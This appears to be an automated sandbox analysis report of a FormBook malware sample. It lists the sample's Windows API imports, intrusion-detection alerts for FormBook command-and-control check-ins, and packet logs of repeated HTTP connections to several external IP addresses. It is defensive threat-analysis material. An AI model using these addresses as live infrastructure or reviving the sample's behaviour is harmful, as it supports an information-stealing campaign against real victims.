                                                                                  GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                  COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                  OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                                  Possible Origin

                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishGreat Britain

                                                                                  Network Behavior

                                                                                  Suricata IDS Alerts

                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-12-07T07:00:32.905597+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549738154.215.72.11080TCP
                                                                                  2024-12-07T07:01:06.875724+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549819116.50.37.24480TCP
                                                                                  2024-12-07T07:02:30.424909+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54987485.159.66.9380TCP
                                                                                  2024-12-07T07:02:45.221540+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54998791.195.240.9480TCP
                                                                                  2024-12-07T07:03:09.133637+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54999166.29.149.4680TCP
                                                                                  2024-12-07T07:03:24.769279+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549995195.110.124.13380TCP
                                                                                  2024-12-07T07:03:56.385111+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549999217.196.55.20280TCP

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 7, 2024 07:00:31.288686037 CET4973880192.168.2.5154.215.72.110
                                                                                  Dec 7, 2024 07:00:31.408389091 CET8049738154.215.72.110192.168.2.5
                                                                                  Dec 7, 2024 07:00:31.408467054 CET4973880192.168.2.5154.215.72.110
                                                                                  Dec 7, 2024 07:00:31.411022902 CET4973880192.168.2.5154.215.72.110
                                                                                  Dec 7, 2024 07:00:31.530713081 CET8049738154.215.72.110192.168.2.5
                                                                                  Dec 7, 2024 07:00:32.905463934 CET8049738154.215.72.110192.168.2.5
                                                                                  Dec 7, 2024 07:00:32.905492067 CET8049738154.215.72.110192.168.2.5
                                                                                  Dec 7, 2024 07:00:32.905596972 CET4973880192.168.2.5154.215.72.110
                                                                                  Dec 7, 2024 07:00:32.909291983 CET4973880192.168.2.5154.215.72.110
                                                                                  Dec 7, 2024 07:00:33.029114962 CET8049738154.215.72.110192.168.2.5
                                                                                  Dec 7, 2024 07:00:57.273050070 CET4979680192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:00:57.393053055 CET8049796116.50.37.244192.168.2.5
                                                                                  Dec 7, 2024 07:00:57.393152952 CET4979680192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:00:57.395142078 CET4979680192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:00:57.514825106 CET8049796116.50.37.244192.168.2.5
                                                                                  Dec 7, 2024 07:00:58.904650927 CET4979680192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:00:58.910459995 CET8049796116.50.37.244192.168.2.5
                                                                                  Dec 7, 2024 07:00:58.910526991 CET8049796116.50.37.244192.168.2.5
                                                                                  Dec 7, 2024 07:00:58.910531998 CET4979680192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:00:58.910573006 CET4979680192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:00:59.024560928 CET8049796116.50.37.244192.168.2.5
                                                                                  Dec 7, 2024 07:00:59.024620056 CET4979680192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:00:59.923228025 CET4980680192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:01:00.043216944 CET8049806116.50.37.244192.168.2.5
                                                                                  Dec 7, 2024 07:01:00.043314934 CET4980680192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:01:00.045208931 CET4980680192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:01:00.164979935 CET8049806116.50.37.244192.168.2.5
                                                                                  Dec 7, 2024 07:01:01.570663929 CET4980680192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:01:01.602883101 CET8049806116.50.37.244192.168.2.5
                                                                                  Dec 7, 2024 07:01:01.602911949 CET8049806116.50.37.244192.168.2.5
                                                                                  Dec 7, 2024 07:01:01.602998018 CET4980680192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:01:01.603018999 CET4980680192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:01:01.690371990 CET8049806116.50.37.244192.168.2.5
                                                                                  Dec 7, 2024 07:01:01.690422058 CET4980680192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:01:02.579009056 CET4981380192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:01:02.698839903 CET8049813116.50.37.244192.168.2.5
                                                                                  Dec 7, 2024 07:01:02.698924065 CET4981380192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:01:02.700886011 CET4981380192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:01:02.820703030 CET8049813116.50.37.244192.168.2.5
                                                                                  Dec 7, 2024 07:01:02.820741892 CET8049813116.50.37.244192.168.2.5
                                                                                  Dec 7, 2024 07:01:04.227575064 CET4981380192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:01:04.278106928 CET8049813116.50.37.244192.168.2.5
                                                                                  Dec 7, 2024 07:01:04.278204918 CET4981380192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:01:04.278225899 CET8049813116.50.37.244192.168.2.5
                                                                                  Dec 7, 2024 07:01:04.278340101 CET4981380192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:01:04.347654104 CET8049813116.50.37.244192.168.2.5
                                                                                  Dec 7, 2024 07:01:04.347713947 CET4981380192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:01:05.235908031 CET4981980192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:01:05.355700970 CET8049819116.50.37.244192.168.2.5
                                                                                  Dec 7, 2024 07:01:05.356975079 CET4981980192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:01:05.359543085 CET4981980192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:01:05.479298115 CET8049819116.50.37.244192.168.2.5
                                                                                  Dec 7, 2024 07:01:06.875571012 CET8049819116.50.37.244192.168.2.5
                                                                                  Dec 7, 2024 07:01:06.875597000 CET8049819116.50.37.244192.168.2.5
                                                                                  Dec 7, 2024 07:01:06.875724077 CET4981980192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:01:06.878355980 CET4981980192.168.2.5116.50.37.244
                                                                                  Dec 7, 2024 07:01:06.998224020 CET8049819116.50.37.244192.168.2.5
                                                                                  Dec 7, 2024 07:01:20.980472088 CET4985280192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:01:21.100509882 CET804985285.159.66.93192.168.2.5
                                                                                  Dec 7, 2024 07:01:21.100955963 CET4985280192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:01:21.102893114 CET4985280192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:01:21.223666906 CET804985285.159.66.93192.168.2.5
                                                                                  Dec 7, 2024 07:01:22.629990101 CET4985280192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:01:22.750073910 CET804985285.159.66.93192.168.2.5
                                                                                  Dec 7, 2024 07:01:22.750154972 CET4985280192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:01:23.658107042 CET4986180192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:01:23.777955055 CET804986185.159.66.93192.168.2.5
                                                                                  Dec 7, 2024 07:01:23.778217077 CET4986180192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:01:23.780034065 CET4986180192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:01:23.899801016 CET804986185.159.66.93192.168.2.5
                                                                                  Dec 7, 2024 07:01:25.295381069 CET4986180192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:01:25.415218115 CET804986185.159.66.93192.168.2.5
                                                                                  Dec 7, 2024 07:01:25.416982889 CET4986180192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:01:26.313599110 CET4986680192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:01:26.433442116 CET804986685.159.66.93192.168.2.5
                                                                                  Dec 7, 2024 07:01:26.433545113 CET4986680192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:01:26.436085939 CET4986680192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:01:26.555876970 CET804986685.159.66.93192.168.2.5
                                                                                  Dec 7, 2024 07:01:26.556937933 CET804986685.159.66.93192.168.2.5
                                                                                  Dec 7, 2024 07:01:27.952920914 CET4986680192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:01:28.073523998 CET804986685.159.66.93192.168.2.5
                                                                                  Dec 7, 2024 07:01:28.075037956 CET4986680192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:01:28.971993923 CET4987480192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:01:29.093441963 CET804987485.159.66.93192.168.2.5
                                                                                  Dec 7, 2024 07:01:29.093527079 CET4987480192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:01:29.095707893 CET4987480192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:01:29.215578079 CET804987485.159.66.93192.168.2.5
                                                                                  Dec 7, 2024 07:02:30.422030926 CET804987485.159.66.93192.168.2.5
                                                                                  Dec 7, 2024 07:02:30.422172070 CET804987485.159.66.93192.168.2.5
                                                                                  Dec 7, 2024 07:02:30.424909115 CET4987480192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:02:30.433018923 CET4987480192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:02:30.552845955 CET804987485.159.66.93192.168.2.5
                                                                                  Dec 7, 2024 07:02:35.815942049 CET4998480192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:35.935673952 CET804998491.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:35.935894966 CET4998480192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:35.940668106 CET4998480192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:36.060373068 CET804998491.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:37.213833094 CET804998491.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:37.213860035 CET804998491.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:37.213947058 CET4998480192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:37.451513052 CET4998480192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:38.469856977 CET4998580192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:38.589778900 CET804998591.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:38.589859009 CET4998580192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:38.592127085 CET4998580192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:38.711905956 CET804998591.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:39.868596077 CET804998591.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:39.868693113 CET804998591.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:39.871151924 CET4998580192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:40.111032009 CET4998580192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:41.127723932 CET4998680192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:41.247766018 CET804998691.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:41.247865915 CET4998680192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:41.250171900 CET4998680192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:41.369915962 CET804998691.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:41.370012999 CET804998691.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:42.527017117 CET804998691.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:42.527117014 CET804998691.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:42.527173042 CET4998680192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:42.764019966 CET4998680192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:43.784548998 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:43.904392004 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:43.909183025 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:43.913047075 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:44.032879114 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.221385956 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.221416950 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.221430063 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.221529007 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.221539974 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.221539974 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:45.221553087 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.221590996 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:45.221609116 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:45.221679926 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.221693039 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.221705914 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.221719027 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.221739054 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:45.221755981 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:45.341567039 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.341628075 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.341742039 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:45.345868111 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.388940096 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:45.413263083 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.413279057 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.413397074 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:45.417541027 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.417587996 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.417661905 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:45.425878048 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.425950050 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.426037073 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:45.434325933 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.434436083 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.434520960 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:45.437052011 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:45.556699991 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:59.688719034 CET4998880192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:02:59.808722973 CET804998866.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:02:59.815210104 CET4998880192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:02:59.894686937 CET4998880192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:00.014550924 CET804998866.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:01.062185049 CET804998866.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:01.062391996 CET804998866.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:01.062444925 CET4998880192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:01.420447111 CET4998880192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:02.438908100 CET4998980192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:02.558778048 CET804998966.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:02.558872938 CET4998980192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:02.594657898 CET4998980192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:02.714881897 CET804998966.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:03.787285089 CET804998966.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:03.787492990 CET804998966.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:03.789294958 CET4998980192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:04.115751028 CET4998980192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:05.133518934 CET4999080192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:05.253448963 CET804999066.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:05.253566980 CET4999080192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:05.255558968 CET4999080192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:05.375405073 CET804999066.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:05.375489950 CET804999066.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:06.501502991 CET804999066.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:06.501637936 CET804999066.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:06.501744032 CET4999080192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:06.764190912 CET4999080192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:07.785252094 CET4999180192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:07.905050993 CET804999166.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:07.905198097 CET4999180192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:07.907162905 CET4999180192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:08.027019978 CET804999166.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:09.133428097 CET804999166.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:09.133590937 CET804999166.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:09.133636951 CET4999180192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:09.136701107 CET4999180192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:09.257195950 CET804999166.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:15.108252048 CET4999280192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:15.228236914 CET8049992195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:15.228353977 CET4999280192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:15.262001991 CET4999280192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:15.381815910 CET8049992195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:16.540817976 CET8049992195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:16.540941954 CET8049992195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:16.541165113 CET4999280192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:16.764290094 CET4999280192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:17.825767040 CET4999380192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:17.945573092 CET8049993195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:17.951831102 CET4999380192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:18.067347050 CET4999380192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:18.187212944 CET8049993195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:19.260643005 CET8049993195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:19.260844946 CET8049993195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:19.260893106 CET4999380192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:19.592535973 CET4999380192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:20.622262955 CET4999480192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:20.742337942 CET8049994195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:20.742453098 CET4999480192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:20.789870024 CET4999480192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:20.910049915 CET8049994195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:20.910084963 CET8049994195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:22.163995028 CET8049994195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:22.164211988 CET8049994195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:22.164326906 CET4999480192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:22.311238050 CET4999480192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:23.337935925 CET4999580192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:23.457896948 CET8049995195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:23.457982063 CET4999580192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:23.461193085 CET4999580192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:23.581078053 CET8049995195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:24.769037962 CET8049995195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:24.769234896 CET8049995195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:24.769279003 CET4999580192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:24.771866083 CET4999580192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:24.891592026 CET8049995195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:47.056205034 CET4999680192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:47.175944090 CET8049996217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:47.176027060 CET4999680192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:47.178399086 CET4999680192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:47.298177958 CET8049996217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:48.373049021 CET8049996217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:48.373591900 CET8049996217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:48.375886917 CET4999680192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:48.686845064 CET4999680192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:49.711129904 CET4999780192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:49.831012011 CET8049997217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:49.831192017 CET4999780192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:49.835768938 CET4999780192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:49.955672979 CET8049997217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:51.029675961 CET8049997217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:51.029900074 CET8049997217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:51.029968977 CET4999780192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:51.342700005 CET4999780192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:52.361726046 CET4999880192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:52.484250069 CET8049998217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:52.484400034 CET4999880192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:52.489723921 CET4999880192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:52.609568119 CET8049998217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:52.609941006 CET8049998217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:53.681307077 CET8049998217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:53.681364059 CET8049998217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:53.685746908 CET4999880192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:54.049747944 CET4999880192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:55.064641953 CET4999980192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:55.184453011 CET8049999217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:55.184561968 CET4999980192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:55.187002897 CET4999980192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:55.306890011 CET8049999217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:56.384815931 CET8049999217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:56.384907007 CET8049999217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:56.385111094 CET4999980192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:56.385181904 CET8049999217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:56.385272026 CET4999980192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:56.387691021 CET4999980192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:56.507512093 CET8049999217.196.55.202192.168.2.5

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 7, 2024 07:00:29.009788036 CET5990453192.168.2.51.1.1.1
                                                                                  Dec 7, 2024 07:00:29.998707056 CET5990453192.168.2.51.1.1.1
                                                                                  Dec 7, 2024 07:00:31.014116049 CET5990453192.168.2.51.1.1.1
                                                                                  Dec 7, 2024 07:00:31.281286955 CET53599041.1.1.1192.168.2.5
                                                                                  Dec 7, 2024 07:00:31.281318903 CET53599041.1.1.1192.168.2.5
                                                                                  Dec 7, 2024 07:00:31.281330109 CET53599041.1.1.1192.168.2.5
                                                                                  Dec 7, 2024 07:00:47.954760075 CET6453553192.168.2.51.1.1.1
                                                                                  Dec 7, 2024 07:00:48.511384010 CET53645351.1.1.1192.168.2.5
